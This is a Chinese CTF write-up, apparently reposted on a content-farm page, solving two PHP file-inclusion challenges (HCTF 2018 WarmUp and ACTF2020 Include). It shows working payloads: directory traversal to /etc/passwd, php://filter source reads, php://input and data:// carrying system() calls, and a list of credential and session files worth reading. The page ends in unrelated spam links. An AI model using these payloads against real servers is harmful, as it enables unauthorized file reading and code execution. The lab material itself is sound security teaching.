当前位置: 首页 > wzjs >正文

各大电商购物网站转化率报表中国著名外贸公司有哪些

各大电商购物网站转化率报表,中国著名外贸公司有哪些,海南黄页电话号码,个人做网站的好处目录包含 文章目录 目录包含[HCTF 2018]WarmUp1[ACTF2020 新生赛]Include1 [HCTF 2018]WarmUp1 本题考查代码审计,具体考查白名单过滤不严格、文件包含include()实现目录遍历 #知识点 1、文件包含函数include() 、include_once() require() 、require_once() incl…

目录包含

文章目录

  • 目录包含
    • [HCTF 2018]WarmUp1
    • [ACTF2020 新生赛]Include1

[HCTF 2018]WarmUp1

本题考查代码审计,具体考查白名单过滤不严格、文件包含include()实现目录遍历

#知识点
1、文件包含函数include() 、include_once() require() 、require_once() include文件不存在时抛出警告,然后继续执行;require则抛出致命错误,终止执行。2、读取敏感文件读取配置文件:/etc/passwd(Linux 用户信息)、/etc/shadow(密码哈希)、/etc/hosts、php.ini。读取会话文件:/var/lib/php/sess_<session_id>(获取用户会话)。读取日志文件:/var/log/apache2/access.log(结合日志注入攻击)。读取代码文件:如网站源代码(index.php、config.php等)// 漏洞
include($_GET['page']);// Payload
?page=/etc/passwd
?page=../../../../etc/passwd  # 目录遍历// 绕过技巧:
使用多个../向上跳转目录。
URL 编码绕过:%2e%2e%2f(../的编码)。#利用 PHP 伪协议
3、php://input:读取 POST 原始数据(条件:allow_url_include=On)
// 攻击请求
?page=php://input
<?php system('cat /etc/passwd'); ?>4、php://filter:读取文件源码(用于代码审计)
// 读取源码并Base64编码
?page=php://filter/convert.base64-encode/resource=[文件名]5、data://text/plain:注入 PHP 代码(条件:allow_url_include=On)
?page=data://text/plain,<?php system('id'); ?>6、zip:///phar
//:利用压缩文件包含恶意代码
......

题目名称无有效信息,打开是一个图片,查看源代码

image-20250519215610067

image-20250519215641140

注释信息中有一个source.php,给出了代码,白名单数组中还定义了一个hint.php

 <?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;}}if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {include $_REQUEST['file'];exit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";}  
?> 

代码中class emmm定义过滤函数checkFile(& p a g e ) ,首先使用仅包含 ‘ s o u r c e . p h p ‘ 、 ‘ h i n t . p h p ‘ 关键字的白名单数组,对传入的 ‘ page),首先使用仅包含`source.php`、`hint.php`关键字的白名单数组,对传入的` page),首先使用仅包含source.phphint.php关键字的白名单数组,对传入的page参数进行一次截取第一个?前字符串进行过滤的操作,如果传入的参数在 w h i t e l i s t ‘ 中,则放行,若不是,则不予通过;然后进行一次 ‘ whitelist`中,则放行,若不是,则不予通过;然后进行 一次` whitelist中,则放行,若不是,则不予通过;然后进行一次_page = urldecode($page)`URL解码;然后再对编码后的参数进行一次截取过滤。

image-20250519232009567

通过checkFile()检查后,代码引用了危险函数include()进行文件包含,存在文件包含漏洞

如何绕过?

这里只要确保传入的参数?前是source.php或者hint.php就行

另外,hint.php提示flag在ffffllllaaaagggg

image-20250519220006815

构造payload

http://ad2dbcdc-0269-47c1-b009-4979e8d2c9aa.node5.buuoj.cn:81/?file=source.php?../ffffllllaaaagggg

image-20250519233901106

不在此层,向上遍历目录(网上有师傅说可以直接遍历n个…/,可以直接遍历到最顶层)获得flag

http://ad2dbcdc-0269-47c1-b009-4979e8d2c9aa.node5.buuoj.cn:81/?file=source.php?../../../../../ffffllllaaaagggg

image-20250519234000990

[ACTF2020 新生赛]Include1

本题考查php伪协议实现任意文件读取

#知识点
php:// 协议
1、php://filter用于读取源码
php://filter/[filter_name]/resource=[file_path]
2、php://input用于执行php代码#实例
1、php://filter/read=convert.base64-encode/resource=[文件名]
读取文件源码(输出经过base64编码后的源代码)
2、php://input + [POST DATA]执行php代码
http://xx.xx.xx.xx?file=php://input
[POST DATA部分]
<?php phpinfo(); ?>
<?php system("ls"); ?>#参考
https://blog.51cto.com/u_15414689/5530906
https://segmentfault.com/a/1190000018991087#comment-area

image-20250519215142360

image-20250519215118082

打开题目,查看源代码、扫描目录均无有效信息。

根据题目名称以及页面链接提示,可知这题考查include()函数,该函数支持伪协议

#支持伪协议的函数还有
1、文件包含函数
include();
include_once();
require();
require_once();
2、文件操作类函数
fopen();
file();
readfile();
file_get_contents();

尝试用php://协议读取flag.php

#构造payload
http://297bdcde-82ca-4256-8196-cdcf3b805bbb.node5.buuoj.cn:81/?file=php://filter/read=convert.base64-encode/resource=flag.php

image-20250519215046716

base64解码

image-20250519215017435

[解题之外]

除了php://filter,突发奇想试了下php://inputdata:// 协议,看看结果。

image-20250521205439742

应该是被过滤了关键字

尝试读取index.php

image-20250521213740509

转码发现果然过滤了部分伪协议关键字

<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){exit('hacker!');
}
if($file){include($file);
}else{echo '<a href="?file=flag.php">tips</a>';
}
?>

发现后台代码:

  1. 仅过滤了部分伪协议
  2. 采用字符串匹配的方式不够严谨,可以尝试编码绕过
  3. 没有处理文件路径,可能目录遍历

image-20250521215520416

贵在尝试。


文章转载自:

http://ZEAeBKGQ.Lqchz.cn
http://dFfBFgl1.Lqchz.cn
http://K3qzXgUp.Lqchz.cn
http://KCVHSL62.Lqchz.cn
http://LWlth206.Lqchz.cn
http://x3raHUP9.Lqchz.cn
http://eeU5guaR.Lqchz.cn
http://ik6agY70.Lqchz.cn
http://eaScvoWC.Lqchz.cn
http://09qdn5KG.Lqchz.cn
http://eK8n0el4.Lqchz.cn
http://s83g4ahi.Lqchz.cn
http://ooPyzQ7W.Lqchz.cn
http://leLAwOpE.Lqchz.cn
http://zKaf9Deb.Lqchz.cn
http://PorVRD9a.Lqchz.cn
http://rd4xnbTi.Lqchz.cn
http://zKZ3ltew.Lqchz.cn
http://sDbr2wjx.Lqchz.cn
http://RVks24d7.Lqchz.cn
http://LQhDFL7C.Lqchz.cn
http://rFhgez0x.Lqchz.cn
http://daVxLQVF.Lqchz.cn
http://aK5z7JaW.Lqchz.cn
http://ss97l4Qa.Lqchz.cn
http://3oT9BE2T.Lqchz.cn
http://obhnAmbf.Lqchz.cn
http://R3sy33oo.Lqchz.cn
http://y8SRDzjR.Lqchz.cn
http://VhJ4BxQv.Lqchz.cn
http://www.dtcms.com/wzjs/645803.html

相关文章:

  • 从零开始建网站成全视频观看免费观看
  • 商城网站布局淘宝搜索词排名查询
  • 网站导航的建设模板vip解析网站怎么做
  • 怎么为自己的厂做网站网页设计作业网站素材和效果图
  • 最简单的建个人网站网站弹屏广告怎么做
  • 网站项目建设建设期清远企业网站建设
  • 南京城市规划建设展览馆网站湖南郴州建设局网站
  • 网站建设参考的文献网站建设运营成本
  • 淘宝客网站如何备案seo整站优化方案案例
  • 金融公司网站方案天网查询企业查询
  • 策划书标准格式seo搜索优化费用
  • 网站运营维护工作 基本内容包括学网站开发应该学什么软件
  • dw手机销售网站制作福建建设工程信息网查询平台
  • 孝昌网站建设广东网络建设有限公司
  • 出售域名的网站全国最新实时大数据
  • 四川平昌县建设局网站哪个好用?
  • 百度网站提交中国工程预算网
  • 营销型网站四大元素xampp网站后台
  • 宣传中心网站建设wordpress更新提示ftp
  • 手机wap网站开发与设计设计工作室简介怎么写
  • 做360手机网站优化快建设仿优酷视频网站
  • 聊城网站建设有限公司wordpress后台是什么样的
  • 建设专业网站公司外贸网站建设维护
  • 网站开发合同付款比例厦门建设网站企业
  • 搜狐做app的网站百度指数是什么意思
  • 高新网站建设网络营销推广方案怎么做
  • 做网站对企业有什么好处ps网站子页怎么做
  • php网站的开发背景家居企业网站建设渠道
  • 专业的集团网站开发开发电子商务网站建设与管理期末
  • 科技建筑公司网站模仿别人的网站